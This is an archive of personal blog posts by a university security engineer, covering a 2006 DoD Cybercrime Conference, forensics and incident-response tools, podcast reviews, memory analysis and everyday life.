I was disappointed there were not many BoF (birds of a feather) sessions planned. Out of the whopping TWO, I chose the "Bring Your Foo: DoD Wireless Hacking Challenge." Come on, with a name like that, how could I resist. The only thing that I didn't consider was that I only had my 3 month old PowerBook with me and no L33T toolz. I was stuck running nmap across the network and trying to find the servers to be hacked. Dave, the Army CID dude running it, had intended on us being on hubs so we could do some passive recon to figure out what was going on within the network. Unfortunately, we were on switches and no person with an Auditor CD knew what to do with ettercap so we were a bit blind. After a hint from Dave, we knew that the servers were on an entirely different subnet. Again, I was still at a loss with only nmap and no Internet access to grab tools that I could compile on Mac OS X. So, just after I shut down my laptop, I noticed someone using Metasploit which reminded me I had downloaded it on my laptop. In a display of power rivaling that of the most L33T script kiddies, I owned two servers within minutes. Ipconfig on one of them showed it had two NICs with one on a completely different subnet from the first two. Geez. Dave put together an awesome challenge but we had limited time reserved in the room and did not get to complete the challenge. Oh well, it was fun and I have some great ideas for putting on a hacking challenge at UF's next ITSA Day.

That's it for me. I am tired, it has been another long day and I will be up early again tomorrow. Thanks for reading.

DoD 2006 - Days 2 & 3 Update

2006-01-10T23:11:00.000-05:00

Day 2 - 01/09/2006: This was the second day in the Mac OS X forensics class. It was a smidgeon better than the first day. We went through an image of a system and learned about how applications store their configuration, how to read those files, tools to extract data from configs, caches and history files that are specific to certain apps. It was quite interesting to learn about it from a forensic perspective because it also helped me learn more about an OS that I use everyday. I can truly say that I understand X better and where to look if I ever have issues with it or need to cover my tracks. ;-)

The last portion of the class was spent cracking the passwords. It was surprisingly simple. {I just edited this as I started to talk about a tool we used in class but realized it might be a violation since it is an internal tool for "Official Use Only."}. The passwords were pretty easy to get to and crack. I was quite surprised, but remember, this was done on Panther. The instructor said that Tiger has made some changes making it trickier...but not impossible. He will be giving a presentation in the next day or two about Tiger and specific forensic challenges such as this.

Monday evening, the expo began with a large list of vendors and some tasty food. There was a gimmick to get attendees to visit booths by giving out a list of the vendors and requiring their signature from 25 of them so you could be entered into a raffle. I finished it after listening to quite a few pitches but did talk to some interesting people. The turnout of attendees and number of vendors was quite impressive, and I walked away with some pretty darn useful tools and swag. I even got added to a mailing list, portal and magazine subscription that I probably wouldn't have access to if I wasn't here.

Day 3 - 01/10/2006: Today was the official kickoff of the conference with the keynote and headliners. Jordan and I missed the keynote because we were working on the Cipher Hunt challenge which required us to find clues all over the large Innisbrook property and solve the cipher on each one to find the next clue. With a little social engineering and good decipering skills, we kicked some but and were most likely the first team to finish it (but there may have been _1_ before us). This was also the only day they are feeding us all day according to the schedule. There was a nice breakfast, lunch and dinner in a walk_around_and_choose_what_you_want_to_eat_from_the_many_food_tables format.

Det Randy Stone gave a brief presentation about the BTK case and an intro into the forensics that helped catch the killer. It was quite impressive. Johnny Long gave a very amusing presentation on how Hollywood has portrayed hacking. It was damn funny as he went through examples from Hackers, Net Force, Swordfish and more. We were asked to choose if the portrayal was L33T or LAME. Holy Crap! We were all laughing! David Marconi spoke next about Hollywood villians. It was written up as being a talk about the future of hacking in the movies but I didn't see any of that. He was talking about having multidimensional villians and showed too many movie of these types of villians. Oh well, not great.

The evening had food, tickets for free drinks and more vendor action. At 6:30pm, they raffled all kinds of cools vendor-donated prizes. Do you think I won anything? Heck No!! Jordan won the _last_ prize to be given out...a Symantec engraved 20gb iPod Photo. After that, we had the Floppy Disk Throw as the second part of the Cybercrime Conference Olympics as a followup to the Cipher Hunt. We did a great job but there was some crappy judging, crappy distance recording, contestants who should not be eligible and shady score changes at the end. We should have been 2nd but were "bumped" to 5th. Even with that pile of crap, we should still be in the Top 3 and win some kick-butt prizes thanks to our excellent Cipher Hunt work.

It was a LONG day so I will be crashing soon. Sleep will not be coming soon enough. There is so many cool presentations tomorrow. It starts with Johnny Long at 8:30 and keeps getting better after that. I will keep you updated.

Department of Defense Cybercrime Conference 2006

2006-01-08T20:58:00.000-05:00

Today was the first day of the DoD Cybercrime 2006 annual conference. If you check the site, it says the official start date is Jan 10, but they are holding two days of training before the official conference kickoff that were included in the cheap $225 conference fee. That is ridiculously cheap so guess which one I took advantage of...do you know? Well, since I made the decision to buy a PowerBook at work so I could learn more about Mac OS X incident response, I couldn't pass up two days of Mac OS X forensics training. BTW, if you know anything about the conference, you have to be DoD personnel, DoD contractors or some sort of law enforcement. Thankfully, the University Police Department sponsored me so I could attend. SWEET! It is a lot of fun being around all these "feds."

How is it so far? Well, if you haven't been to the Westin Innisbrook Golf Resort, it is a gorgeous place with lush golfing all around the resort. I have spoken here two years in a row for the FAEDS conferences and was happy to finally get to come as an attendee of conference where I can really enjoy the amenities. As for the conference, there are already quite a few feds lurking around the classes. The Mac OS X forensics class is quite good. I have enjoyed most of it and learned quite a bit already. Since the instructors are teaching from a thick book used in their two week class, they have to skim over some topics but I get to keep the book to review later on. Also, the book hasn't been updated for Tiger but the instructor has been doing a good job of pointing out any differences. One instructor is doing a Tiger-specific forensic presentation later this week so I might catch that one, too.

So, my initial thoughts...can I clone myself? There are so many presentations that I want to attend and so little time to fit them all in. About 8-12 presentations are going on simultaneously and I want to see at least 2-5 of them each hour. Luckily, I have been given the "Law Enforcement Only" CD that contains all the presentations, so whatever I don't make it to, I can look at the presentation later. Fantastic stuff. I will try to post every day what is going on and my thoughts about it all.

Performancing for Firefox

2006-01-02T12:41:00.000-05:00

This is my first post with the Performancing extension for Firefox. It appears to be very powerful so far. After installation, I hit F8 and the bottom half of Firefox turned into a WYSIWYG blog editor. I really like it so far. First impressions are great. Right now, I am using it on my PC at home but will be testing it on my PowerBook later today. It supports Blogger.com (what I use), WordPress, TypePad, LiveJournal, MSN Spaces and Custom Blogs running on your own webserver with software like WordPress, Movable Type, Drupal, TextPatter, Blogger API and MetaWeblog API.

I was attempting to use the Developer Preview of Flock but it is still pretty buggy and does not compare to Performancing. If you are a blogger and use any of the supported blog software/sites, definitely check out Performancing. Thanks to Martin McKeay for mentioning it in his podcast.

Gearing up for the holidays!

2005-12-23T12:11:00.000-05:00

That topic can certainly mean multiple things like, "I am simply getting ready for Christmas" or "I am gathering all my geeky electronics so I can stay connected while out of town" or "I am hoping to get a iPod Video for Christmas." When I started writing it, I was just referring to getting all of our stuff together, but there is a lot of geek stuff that I tend to take with me...PowerBook, iPod, Treo 650, CDs/DVDs and some piece of hardware I am messing around with like a firewall, router, external hard drive or sometimes even a full blown PC. This year will not be overpacked. I have an article to start working on ASAP which will be done on my PowerBook with Virtual PC while listening to my iPod.

Enough of my rambling...it is the Friday before Christmas and campus is dead. Time to go home and work from the comfort of my couch.

Merry Christmas!

Podcasts I Listen To...

2005-12-20T23:59:00.000-05:00

I was planning on getting this list out last week but never bothered to sit in front of my desktop to look at the iTunes podcast subscriptions since I post to my blog from my PowerBook. So, here it goes. They are in alphabetical order thanks to iTunes. I will post my opinions and descriptions with each one. Note: This list and the links took quite a while to put together. I hope you find it useful. Disregard misspellings and such because it is late!

A Day in the Life of an Information Security Investigator

This is a fun and informative listen. It is based on the Chief's blog. The Chief, aka Security Monkey, talks about his cases as a security investigator, answers questions from his monkey (blog readers) and allows his right-hand man, Scrap, to rant. Definitely one of my favorites.

Ancestor

This is a podcast novel by Scott Sigler who releases a new chapter/episode every week. Another one of my top favorites. I really look forward to listening every Mon as the story unfolds. If don't mind some blood, gore and explicit language, check it out!

Blue Box: The VoIP Security Podcast

I had to catch up as I came into listening around the 8th episode. It is a good podcast about VoIP issues, current trends, new products and topics from the VOIPSA mailing list.

Diggnation

I enjoy just about every episode. I find myself laughing out loud to while walking around campus or having lunch in the breakroom. Kevin and Alex talk about the top "dug" stories from the site Digg.com. They provide adolescent humor the entire time making me wonder why I like it so much, but I think it just reinforces why I like it so darn much. The comic relief makes it one of my top favorites.

EarthCore: A Podcast Novel

This is the first podcast novel ever and Scott Sigler did a great job. I was always looking forward to the new episodes. It has ended and even become published because of the huge fan base. You can catch up on all the episodes as they are still online. This ranks in my top favorites. Plenty of blood, gore and explicit language.

ITC: Security

I keep this in my iTunes list in hopes that good stuff will come around again. There have been three really good ones that I have saved and sometimes relisten too. Most suck. The chick who runs the "security university," or whatever it is called, is a moron and conducts awful interviews. Check out the ones with Ron Gula and Dan Geer. I also have Bruce Schneier's in my list under ITC but can't remember if it was really that good.

Martin McKeay

Martin is a CISSP with a pretty good blog. He is focused quite a bit on the Payment Card Industry (PCI) regulations and has some good insight into it. I enjoy his blog and podcast but wish he would fix it so I could subscribe via iTunes. As he gets more into podcasting and decides more on a structure for the shows, I could see this as possibly becoming a favorite.

Mighty Seek: WebAppSecurity

There have only been a handful of episodes but they were pretty good regarding web application security. The host gets on his soapbox a bit but he has intelligent arguments. I hope to hear more good stuff from this one.

Mommycast.com

I started listening to a couple of these after I had begun downloading them for my wife. At the time, she was pregnant and I was able to use some of the things I learned from the podcast to immediately help her through the pregnancy. It has been a couple of months since I listened to any of them but keep them around for her and the chance I might be interested again.

Network Computing | Security Channel

I subscribed to this because it is done by a friend of mine. I have only listened to about 4-5 of them and enjoyed a couple. The ones that include interviews are usually the best ones. If you are of limited time and get bored easily, you might want to pass over this one. I do expect it to get better, but it isn't there yet.

NotParanoia Podcasts

I'm not sure I have made it through a full episode yet. The hosts are in Australia and England making the sound quality pretty shoddy. I keep it in my list so that one day I will go back and give it another chance. Maybe the newer ones have gotten better. YMMV.

NPR: 7AM ET News Summary

I am not a world news, or even a local news, nut. If the news doesn't come in a security related e-mail, I don't usually know about it. This is my weak attempt at knowing what is going on in the world.

PaulDotCom Security Weekly

This is a pretty decent podcast. I do get a little tired of the guys rehashing current security issues but it is fun to listen to their ideas. They tend to be goofy when referring to putting on their White/Gray/Black hats when discussing issues but I have hope that they will continue to refine their podcast.

SABAGsecurity

This is by two guys that work for McAfee. It is pretty good. They don't evangelize their products as much as you might think. McAfee product coverage is minimal with only talking about new releases or bugs. The rest of the time is spent on a topic of the week or month and current "notable" vulnerabilities. Not a favorite but it has potential.

Security Catalyst

This is a great podcast. Michael is a Lead CISSP Instructor who speaks and trains professionally. He has good insight into security topics, does not focus on current issues (thankfully) and has grand plans for his podcast. He is currently looking for a co-host and has an "editorial board" to help plan the episodes. Michael certainly puts a lot of time and effort into his podcast. I enjoy this one quite a bit and expect it to become a top favorite.

Security Now!

Ugh...I'm not sure why I keep this around. Steve Gibson is a smart guy but sometimes sounds like he needs to switch to decaf cause he gets talking so fast that he says the wrong thing. Now, I am sure it is simply because he is overexcited and confuses himself. But then again, maybe the fact the Leo Laporte is a computer security ID10T. Seriously, Leo is security stupid. It hurts me to listen sometimes. I don't think I have ever listened to a full episode out of boredom or disgust. I think I just keep it around for pure masochistic joy.

Systm

This is a video podcast that I have only watched one episode but plan on going back and watching. I have an iPod Photo so watching it requires me to sit in front of my desktop, which I don't do much anymore since thanks to my PowerBook. This one has some definite potential as long as Kevin Rose doesn't try to act too much like a "hacker."

Helix 1.7 is out!

2005-12-19T23:04:00.000-05:00

Did you get the message? Neither did I. Helix is an awesome Linux bootable CD for incident response and forensics. On top of being a great bootable CD, it has an excellent Windows incident response side to it. Sort of a Dr Jekyll Mr Hyde type of thing. It is bizarre to me that such a nice update didn't get any fanfare. The Helix site doesn't even state that 1.7 is available. The forum mentions it and the changelog is updated but the page doesn't state the version or an updated file hash.

Some of the highlights of the update include Linux and Windows features. Some of the Linux updates include a 2.6.14 kernel, updated tools like Autopsy, Sleuthkit, Firefox, dcfldd, and new tools like the EnCase Linen Utility, tcpxtract and hfsplus for Mac drives. For Windows, a new GUI, log files saved in PDF, updated tools like WFT, FRED. and new tools such as IRCR, Forensic Server Project and FTK Imager.

Definitely check out Helix when you have time. It is worth your time if you do any sort of Incident Response or Forensics. One beef I have with Helix is the GUI under Windows. I posted a message in the forum to see if Drew would modify Helix's behavior to open a CMD prompt first and then let the user choose to run the GUI if they want. Why? The GUI loads into RAM and could potentially overwrite important evidence. I recommend going straight to a CMD, provide some scripts for imaging memory and local drives and then let users go into a GUI for more in-depth analysis...but that is just my 2 cents. Take for a spin and decide for yourself.

Knowing what's on your box...

2005-12-16T16:49:00.000-05:00

Do you know what is running on your boxes? Really...are you sure? I was handling an incident today where a machine was compromised through a unnamed database running that was part of a terminal server application. The whole time I am investigating the compromise I was wondering if they knew the DB was running, and if so, did they think about whether or not it needed to be externally accessible and did they think that maybe it would need to be updated. Heck, maybe they thought the vendor who was using the DB would be responsible and provide updates to it. Beats me. As an incident handler, I don't always get my hands on the boxen that get 0wN3d. I get to provide the network forensic data proving it was compromised so that the system administrator can deal with it appropriately.

On a related note, the first alpha release of Metasploit was released yesterday. It is now based on the Ruby programming language which a friend of mine referred to as being as simple as writing pseudocode. I plan on checking it out as it may be applicable the the private hacking challenge I am working on. The whole point of this paragraph is that I was wondering if the release might have be why we saw the DB get exploited today. I haven't bothered checking all the new sploitz included in the the alpha release, but I can tell you that last year's big release caused a two immediate compromises of servers running the Veritas Backup Exec agent.

That's enough for now. I have to run home to get ready for a party that is an hour and a half away. I know I promised my lists of podcasts today but that will either have to wait until after the party or maybe later this weekend. TGIF!

When to rebuild...

2005-12-15T16:45:00.000-05:00

We have this little section in our policy that states a system must be rebuilt after it is compromised. In some situations, the rebuild will be at the discretion of the Information Security Manager. Unfortunately, system administrators like to argue about this or simply ignore it when it comes to malware. I have seen computer support technicians work on a spyware/adware infected box for THREE DAYS before finally giving up and rebuilding. Get a freaking clue people!!! The box could have been rebuilt using Ghost, Microsoft ADS or favorite imaging app in 20 to 60 minutes, yet you wasted 3 days. Holy crap! I seriously wanted to smack some of these people. There are some malware infections that are very simple to alleviate, but others are a real pain and most help desk people are not trained to deal with these types of things. I truly amazes me. I have had things handed to me that were not able to be "cleaned" by the help desk that I solved in 5-10 minutes yet spent the next 30 minutes verifying that it wasn't something more sinister. Rootkits are becoming more prevalent and more malware is using a "rootkit" driver to hide their processes so why not make it easy on yourselves. Spend some time developing a process where you can burn your systems down to a wiped disk, apply and image or slipstreamed OS/app install and be done with it.

Geez...enough ranting. I need to work on my list of updated tools to put on this site but that probably won't happen until next week. I will have my podcast listing up tomorrow.

Crime Scene: What to do with a running system?

2005-12-14T16:28:00.001-05:00

Are there any forensic specialists out there that analyze a machine while it is running at the crime scene before pulling the power? Why I am asking? I was sitting in a presentation this morning by a law enforcement officer who is said to be a court certified computer forensic expert. He stated that a machine should have its power cord unplugged upon seizure. Someone asked about dumping memory and his response was that it was saved in swap space and will be intact. I don't want to get into why this is not true, but I am curious how many people do live analysis before taking down a system. There is lots of juicy info available in memory and will be lost as soon as power is gone. Of course, if you have an idiot in front of the keyboard, more harm than good can be done. For a trained forensic specialist, I think they could get important information from the live system, document EXACTLY what they did and it hold up in court. Any thoughts??

CISSP - To Be or Not To Be...

2005-12-13T10:09:00.000-05:00

I am seriously considering getting the CISSP. Why? Well, I almost feel like I am missing something by not having it. One of my good friends, whom I respect as a security professional, has had it for a couple of years. There are also two podcasts that I listen to regularly and both individuals are CISSP's. The content of the podcasts are excellent. Specifically, the Security Catalyst is excellent and put on by a CISSP trainer. His insight and topics are very good, much better than most of the podcast and blogs that I read. Of course, that could be a singular instance and not an example of most CISSPs.

I was at a SANS conference last year where I was hanging out with two really sharp fellows when we weren't in the forensics class. We were having sushi and beer when the topic of CISSP came up. They were shocked that I didn't have it yet when I have more advanced certs already. They equated it to a kind of "foot-in-the-door" cert that recruiters look for when scanning applications. I shrugged it off thinking my more technical certs should outweight the CISSP but I am now reconsidering it.

This post is probably more than I want to devote to this topic for now until I talk to a few more friends in the sec biz to get their opinions. There will be a follow-up post about this later along with a post listing all the podcasts I listen to.

Easier & More Efficient Blogging...

2005-12-12T16:19:00.000-05:00

I have been wanting to blog more often because I feel like I have lots of interesting things to add to the security world but find going to Blogger to be a small hurdle that prevents me from doing it. That is a truly lame excuse but it has been enough to cause me to search for more efficient blogging methods. I am now testing Flock, a new Open Source web browser designed to "make it easier to blog, publish your photos and share and discover things." If this is successful, you will start seeing daily blogs from me...which may lead me to my eventual goal of developing a podcast.

HOORAY! Mac OS X Update 10.4.3 LOVES Virtual PC 7.02 for Mac

2005-11-02T15:20:00.000-05:00

I am usually quick to update the latest security fixes and OS patches but didn't get around to it until this morning. What? You're saying that waiting one day after Apple's 10.4.3 update is still freaking fast...well, in the world of enterprise computing, yes, it is, but I am just an individual. Anyways...I have a point

Since I delved into the world of Apple ownership, I was frustrated by the lack of *real* support for Microsoft's Virtual PC for Mac. It could simply be that people don't use it very much...better yet, security professionals and hackers don't use it very much on Macs. That is probably true because finding solutions to problems with it is far from easy compared to VMware.

I still haven't found the solution to my problem with having full network access to the Virtual Machine while it is in "network sharing" mode (aka NAT). BUT, the update to 10.4.3 fixed the Virtual Switch!! What does this mean? Well, the Virtual Switch lets your Virtual Machine get an IP as if it were on the LAN right next to your host machine. Now, when I boot up my Virtual Machine running FreeBSD 5.4, it gets a private IP address on the UF network just like my PowerBook. This gives me the chance to connect/exploit services on the Virtual Machine and thus bypassing the "network sharing" issue. Thanks, Apple, for fixing this issue!!

Quick Book Review: "Stealing the Network : How to Own an Identity"

2005-10-31T12:00:00.000-05:00

I just finished this book on Sun after about a month of trying to get through it. Overall, it was a pretty good book. Because it was written by about 8 different authors, it doesn't flow very well. Now, its predecessor, "Stealing the Network : How to Own a Continent," flowed much better, had just as many authors and was technically superior. I was surprised at the large number of types and grammatical errors. Maybe it was because of them rushing to print? Beats me. It was a pretty good sequel and some of the chapters were genuinely enjoyable. If you haven't read "How to Own a Continent," I highly recommend it. If you have, then consider this one if someone gives you a free copy or you get it cheap used.

What is going on with me? Updates are here!

2005-10-28T09:59:00.000-04:00

I thought I should get a little something up here since people do check regularly and I was just prodded by Martin McKeay after commenting on his blog. If you haven't read his blog, check it out.

Work is great! I am really enjoying my new position on the UF Security Team within the University of Florida. Our website is a little weak right now, but we have a Public Relations person that was hired just before me, and it is one of her projects. I hope to assist and provide information on secure OS builds, incident response tools and procedures, possibly even a security blog...but that might not fly.

I have settled in pretty well with my new Apple PowerBook. It has taken some getting used to. Compiling different forensics tools has not been a problem. I did a quick test of MetaSploit Framework 2.5 and it seemed to work fine. Working within Virtual PC is limiting compared to VMware, but I am getting by OK withing snapshots. :-( I was surprised to find that I could install FreeBSD 5.4 in it.

My coworker Jordan and I are working on "Hacking: The Art of Exploitation" with some guidance from our friend Atlas we met last year at a SANS conference. Atlas was first place individual (Ronin) and third place overall in Capture the Flag (CTF) at Defcon 13. It is very cool stuff. Some of the examples work on MacOSX while the rest I have had to SSH into a SUSE 8.0 Linux box. Oddly, the examples don't work on my SUSE 9.3 box, which I think has to do with some sort of kernel setting for exec-shield, but I don't know yet. I am looking forward to getting into working on real executables...like the ones from CTF.

What else? I am DJing again this weekend at a Haunted House in Orange Park. My daughter, Gabriella Skye, is almost 5 months old. I am drinking coffee daily again, more water, less soda.

I think that is about it. I promise to start posting more technical stuff. My goal will be at least once a day during the week depending on if I am in the office of not. Have a great Halloween!!!

My New PowerBook and MS Virtual PC vs Snapshots

2005-09-29T15:09:00.000-04:00

I decided to take the plunge and get a new 12" Apple PowerBook when I had the opportunity to choose what to buy after starting my new job. Sarah used to have an iBook when she was teaching and it was definitely fun to play with to see what kind of Unix-fu I could perform on it. Add in my desire to learn more about forensics and incident response for Macs and I couldn't resist the urge. It took almost a week to get feeling productive and efficient with it.

Where am I going with this? Well, I love playing with malware and testing incident response techniques on virtual machines. My first love is VMware but there is no Mac version so I am forced to use MS Virtual PC. Unfortunately, it doesn't do snapshots like VMware...BUMMER! I'm not really a fan of undo disks but it maybe what I am forced to do. One idea was to use a tool like Deep Freeze or ShadowUser to lock the system so that any changes were undone with a reboot which is a bit like a costly version of undo disks. I am going to test each method and see which is the easiest and most efficient. Until I decide, I will be making duplicates of my VPC files, working on the dupe and deleting it after my test.

ADDENDUM: I have settled on Undo Disks. The additional software adds a level of unneeded complexity and that is something I definitely don't desire when doing malware analysis. One feature I found during testing is the ability to carry forward changes during reboots when using Undo Disks. Sometimes it is necessary to reboot during analysis to see how malware will react...nice feature! One thing I did not check was how this affects booting up with Helix and dd'ing the hard drive. That is one more test to check. :-)

FAEDS Presentation

2005-09-29T12:16:00.000-04:00

I presented at the Florida Association of Educational Data Systems (FAEDS) for the 3rd year in a row. This year's presentation was based on last years where I went through the stages of incident response and the tools associated with it. Again, I ran over time this year but not as bad as last year, since I tried to fit in the stages of an attack last year. The disappointing part is I didn't get to do my full demonstration of malware analysis in VMware. Oh well, I will either plan better next year (if I get asked back) or ask for two sessions. The presentation is available by clicking on the title of this post. It is a PDF created from PowerPoint 2004 on my new Apple PowerBook. The presentation is a combination of things I have learned through my experience working for the University of Florida, books and blogs I've read and training through the SANS Institute. I hope to start adding in tutorials on malware analysis with videos and screenshots soon.

Memory analysis

2005-09-12T11:00:00.000-04:00

I mentioned this in an earlier post about using dd for memory dumping and analyzing it with strings and how Harlan Carvey was blogging about using the MS Debugging Tools. Well....how far do you think I got with the debugging tools? Yep, practically nowhere. The tools weren't intuitive, I'm not a programmer and you have to have the machine preconfigured to make the dump that the debugging tools can read. LAME!

So, where I am going with this? The Digital Forensic Research Workshop (DFRWS.org) held their conference in Aug where they put on a forensic challenge based on memory analysis. Two entries received top showing on their website and each contained custom programmed tools to parse memory. The real question is will they be releasing these tools. Kntlist looks like it might be a commercial tool written by George M. Garner, but the more interesting tool (or possibly easier) is memparser which rips through a memory dump and pulls out process lists and detailed info about individual processes. Check out the DFRWS site and look for the memory challenge results.

So much going on...

2005-08-31T15:13:00.000-04:00

I can't believe it has been two months since my last post. Since then, I have started a new job as an IT Security Engineer for the University of Florida Security Team, finished the silver GIAC Certified Forensic Analyst cert, written four articles for Network Computing and Secure Enterprise magazine (one already printed in Aug) and more that I am too tired to remember.

I will be presenting again this year at the Florida Association of Educational Data Systems (FAEDS) this year. My title isn't up yet, but I am planning on, "Windows Incident Response, Forensics and Malware Analysis." That might be a lofty goal since I only have a fifty minute spot. I expect to post more on the presentation topic as it develops. Last year, I tried to do to much, ran over, but people were skipping lunch to hang out and hear more. That was cool, plus the president said to one of our administrators when asking if I could return, "Last year one of the most popular and valuable sessions at our conference was by John Sawyer, an engineer from your organization." More to come...

Time for a server upgrade...

2005-06-25T02:40:00.000-04:00

Our server went down for a while Fri. I'm not quite sure how long since Sarah was on it early Fri evening updating photos and I noticed it around 1:15am Sat. It is an old Gateway 450 MHz Pentium II with 256 MB RAM running Suse Linux that probably is either having a power supply problem or I kicked it too many times under my desk. I have considered upgrading it for quite sometime considering there are three fast AMD's sitting next to it. I hate to have to run too many machines simultaneously. Virtualizing it is something that has crossed my mind before since there is a smoking fast dual processor AMD Athlon MP 2000+ & 1800+ machine with 3 gigs of RAM sitting next to me. It is primarily my malware analysis box that is currently in flux as to the OS that will end up on it. I like Suse and Kubuntu. Suse is slick and well-done, plus I like KDE. Suse also is not free and RPMs suck. Kubuntu uses KDE and is Debian-based making software management so much easier than RPMs, but alas, the SMP support is not fabulous and it destroyed the performance of my VMware virtual machines. I downloaded the ISO for Yoper and may try that out after I finish my current NWC review (Red Hat stuff ;). There is a dual mobo with an Athlon MP 1800+ with a gig of RAM that I may be giving Jordan soon. Maybe I can talk him into buying me an Athlon MP 2600+ in exchange so he could then have it with dual 1800+ processors. That is an idea that I might just have to bug him about.

Currently, my desktop is an Athlon 64bit 3200+ with a gig of RAM and there is an Athlon 2600+ with a gig of RAM just sitting next to it unused. Maybe it should become a file and web server...I just don't know. So much power and so little bandwidth used by our sites. That is partly why I was thinking of virtualizing the web server. It provides a layer of security in addition to being able to consolidate server tasks to one powerful machine. Enough rambling about this. I still have yet figured out the true usefulness of the debugging tools I wrote about previously. They are installed, I created a crash dump, opened it to see complaints about symbol issues and have not been able to get much further. Time to sleep since Gabi is finally sleeping. Good night.

Current Incident Response Toolkit

2005-06-18T20:11:00.000-04:00

I have finally compiled my latest IR Toolkit list based on the list layout from Scott F. in the ISC diary (mentioned in a previous post below). I carry several CD's with me that are customized bootable CD's. My primary CD is Helix with all of my tools listed below added into the bin folder so they are available from the custom command prompt, Auditor CD, Whoppix CD, and Knoppix CD. I expect to update my toolkit soon to include the MS Debugging Tools once I become more familiar with it. VMware is my testing platform of choice and my backup DVD contains several custom installs of WinXPPro and Win2003Server with different sized OS drives (so dd'ing them doesn't take forever). I need to go back and modify those environments so they can do memory dumps for analysis as mentioned in Harlan Carvey's blog. Note: McAfee is licensed under my employer's contract and Ad-Aware is not freely licensed for academic use.

Adware & Spyware Tools
|-- Ad-Aware SE Personal - 1.06r1
|-- BHO Demon - 2.0.0.22
|-- CWShredder - 2.15
|-- HijackThis - 1.99.1
|-- Microsoft Windows AntiSpyWare - 2/16/2005 Beta
|-- Spybot Search and Destroy - 1.4

Antivirus Tools
|-- McAfee CleanBoot - 1.0
|-- McAfee Stinger - 2.5.4
|-- McAfee VirusScan Enterprise - 8.0i
|-- Microsoft Malware Removal Tool - 1.4

Incident Response ToolKit
|-- DiamondCS CmdLine - 1.0
|-- DiamondCS OpenPorts - 1.0
|-- FoundStone BinText - 3.0
|-- FoundStone Forensic Toolkit - 2.0
|-- FoundStone Fport - 2.0
|-- FoundStone Galleta - 1.0
|-- FoundStone Pasco - 1.0
|-- FoundStone Rifuti - 1.0
|-- FoundStone ScanLine - 1.01
|-- FoundStone ShoWin - 2.0
|-- FoundStone SuperScan - 4.0
|-- Heysoft LADS - 4.0
|-- Inetcat.org NBTScan - 1.5.1
|-- myNetWatchman SecCheck
|-- NetCat - 1.1
|-- NirSoft CurrPorts - 1.05
|-- NirSoft CurrProcess - 1.10
|-- NirSoft StartupRun - 1.22
|-- NTSecurity.nu PMDump - 1.2
|-- SysInternals AccessEnum - 1.2
|-- SysInternals AutoRuns - 7.01
|-- SysInternals Contig - 1.52
|-- SysInternals DiskView - 2.0
|-- SysInternals FileMon 9x,NT,x64,IA64 - 7.0
|-- SysInternals Hex2dec
|-- SysInternals ListDLLs - 2.25
|-- SysInternals Page Defrag - 2.3
|-- SysInternals ProcessExplorer 9x,NT,x64- 9.11
|-- SysInternals PS Tools - 2.15
|-- SysInternals RegMon 9x,NT,x64,IA64 - 7.0
|-- SysInternals Rootkit Revealer - 1.4
|-- SysInternals Sdelete - 1.4
|-- SysInternals ShareEnum - 1.6
|-- SysInternals Sync - 2.2
|-- SysInternals Sigcheck - 1.2
|-- SysInternals Strings - 2.1
|-- SysInternals TCPView - 2.4
|-- Red Cliff Web Historian - 1.1
|-- Sam Spade - 1.14
|-- Tigerteam.se SBD (encrypted netcat) - 1.36
|-- UnxUtils - 04-14-03
|-- Windows Forensic Toolchest (WFT) - 2.0

Security Tools
|-- Ethereal - 0.10.11
|-- Nmap - 3.81
|-- MS Baseline Security Analyzer - 1.2.1
|-- Putty - 0.58
|-- WinDump - 3.8.3 beta
|-- WinPcap - 3.1 beta 4
|-- WinSCP - 3.7.5 beta

MS Debugging Tools vs. DD & Strings

2005-06-17T19:41:00.000-04:00

How do you analyze memory (live or dumped)? Most people I know, texts read and classes taken speak of using strings (cli) or bintext (gui) against a dd of memory. Strings will pull out all kinds of interesting information like URLs, IPs, usernames, passwords, parts of files, so on and so forth. Of course, all the information is a pain to sort through thanks to all the non-human readable crap contained within memory. Pmdump (cli) or CurrProcess (gui) are used on live systems to dump running processes letting us see decrypted malware to help determine its intent through strings or running against a slew of virus scanners to see if its core is a variant of something else.

Harlan Carvey has a couple of blog entries about "RAM, memory dumps and debuggers" that raises several issues I hadn't thought of before now. I have tried my hand at Ollydbg and a couple of pieces of malware to learn more about their protection scheme and the underlying goal of the writer but never really knew what I was doing. Now, I have new tools to learn to pick apart malware. The next step is to add them to my custom Helix CD and see what I can break. Also, Harlan (or is it Mr Carvey) linked several MS KB articles about generating full memory dumps, kernel memory dumps and small memory (64K) dumps on command.

I will write more when I get some testing time in. For now, I have to work on a review for NWC. That, and my list too. I will add the MS debugger to that list, now.

Good Tool Listing on ISC

2005-06-12T17:25:00.000-04:00

There is a good listing of incident response tools listed during one the daily journals on the Internet Storm Center. The list was done by Scott F. (I don't know who he is) and is organized quite nicely. I like the way the tools are listed and will post my kit shortly in the same manner but with version numbers making it easy to keep track of what I have so checking the tools site can show me quickly if I have the latest version or not. The other thing I like doing that was not touch on is using Helix as my main IR tool. Scott's list includes Helix at the bottom as an "additional CD I keep around for the Unix geek in me." Helix's live IR analysis features ROCK! I have customized the win32 side of Helix with tools the I prefer to use and were not included originally, in addition to updated versions of the tools that have been released since Helix was pressed. And, to top it all off, I ripped out the Unix side of Helix and created a custom WinPE environment which is a little more useful in win32 IR and forensics. What is the ETA on my list??? This week since I will be telecommuting from home in order to help out with my new beautiful daughter, Gabriella Skye Sawyer. The next few weeks of telecommuting will give me the opportunity to catch up on documentation and policy items. Yeah, go ahead and groan as I did when typing that. Policies = Political Ick!

The Joy of Reading

2005-05-30T22:00:00.000-04:00

So, I used to read tons of books in high school and community college, but got out of the habit once I found my way down to the University of Florida. I have read through a number of computer and security related books over the years and never really gotten the enjoyment out of them the same as when I read previously. Last year, "Stealing the Network: How to Own a Continent" was placed into my lap by a co-worker thinking it was right up my alley. It was a great book. I wish there were more computer books written this way to make them more readable instead of the typical dry, technical content. I haven't even read a technical book cover to cover in over a year because of the lack of page-turning quality found in a good novel.

Thanks to Sarah, I have fallen in love with reading, again. She has tried getting me to read several times over our years together, but it wasn't until our honeymoon trip to Maui in March that she suckered me into reading a John Grishman book we had laying around and BOOM! I read three novels before we returned to the mainland. Below are the books I have read so far this year, the ones I am currently reading and those I am looking forward to reading.

Books I read in 2005:
The Zero Game - Brad Meltzer
The Tenth Justice - Brad Meltzer
Dead Even - Brad Meltzer
The Last Juror - John Grisham
The King of Torts - John Grisham
The Summons - John Grisham
Frankenstein Book One: The Prodigal Son - Dean Koontz
The DaVinci Code - Dan Brown

Books I am Reading:
The Millionaires - Brad Meltzer
